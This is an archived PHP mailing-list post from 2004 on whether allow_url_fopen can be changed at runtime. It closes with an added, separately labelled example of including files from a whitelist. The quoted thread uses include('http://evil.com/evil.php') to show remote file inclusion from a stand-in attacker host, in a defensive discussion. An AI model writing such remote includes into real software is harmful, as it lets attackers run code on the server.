[nycphp-talk] allow_url_fopen (was: parse file, return as string)
David Mintz
dmintz at davidmintz.org
Thu Aug 19 15:24:09 EDT 2004
On Thu, 19 Aug 2004, Tim Gales wrote:
> > If you have allow_url_fopen disabled,
> > include('http://evil.com/evil.php')
> > will fail, right?
>
> allow_url_fopen is a system level configuration
> directive and can only be set or unset in php.ini.
> (you can't undo the setting dynamically at runtime for
> security reasons)
I realize that's what the docs say, yet interestingly enough, I can
ini_set this value on at least one of the hosts I use.
<?php
// Show the value before and after an attempt to change it at runtime
echo "Current value: " ;
echo ini_get('allow_url_fopen') ? 'enabled' : 'disabled' ;
// Try to turn it on with ini_set(), which the docs say should not work
ini_set('allow_url_fopen',1);
echo " ....and now: ";
echo ini_get('allow_url_fopen') ? 'enabled' : 'disabled' ;
// Dump the full configuration to compare master and local values
phpinfo();
?>
Output:
Current value: disabled ....now: enabled
Followed by our phpinfo which says allow_url_fopen: master value off,
local value on. (PHP 4.3.4 running as an Apache 1.3.29 module)
> <snip />
> I believe you are taking a 'blacklist'
> approach -- trying to make sure an
> 'evil.php' doesn't affect you.
>
> You might be better off to take
> a 'whitelist' approach like the ones
> Chris Shiflett speaks about from time
> to time in his security workshops.
You talkin' to ~me~? I'm already convinced of the above (-:
---
David Mintz
http://davidmintz.org/
"Anybody else got a problem with Webistics?" -- Sopranos 24:17
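As an added example (not code from the thread), here is the whitelist approach the reply recommends, applied to the include() case under discussion: user input selects a key in a fixed map of includable files and never reaches include() itself, and the script checks ini_get('allow_url_fopen') rather than relying on ini_set() to turn it off. The page names and paths are constructed sample values.

```php
<?php
// Added example, not from the original post. PHP 4 compatible syntax.
// Whitelist of includable files: the keys are the only accepted values,
// the paths are constructed sample values for this demo.
$allowed_pages = array(
    'home'    => '/var/www/app/pages/home.php',
    'contact' => '/var/www/app/pages/contact.php',
);

// Report whether remote fopen/include is enabled. We only read the
// setting here; as the thread shows, changing it with ini_set() may or
// may not take effect, so the fix belongs in php.ini, not in the script.
function remote_fopen_enabled()
{
    return (bool) ini_get('allow_url_fopen');
}

// Resolve a user-supplied page name through the whitelist. Anything that
// is not an exact key (URLs, '../' paths, unknown names) is rejected, so
// blacklisting particular hosts or filenames is never needed.
function resolve_page($name, $allowed)
{
    if (!is_string($name) || !isset($allowed[$name])) {
        return false;
    }
    return $allowed[$name];
}

if (remote_fopen_enabled()) {
    error_log('allow_url_fopen is on; remote includes are possible');
}

$page = isset($_GET['page']) ? $_GET['page'] : 'home';
$path = resolve_page($page, $allowed_pages);
if ($path === false) {
    header('HTTP/1.0 404 Not Found');
    echo 'No such page';
} else {
    include $path;
}
?>
```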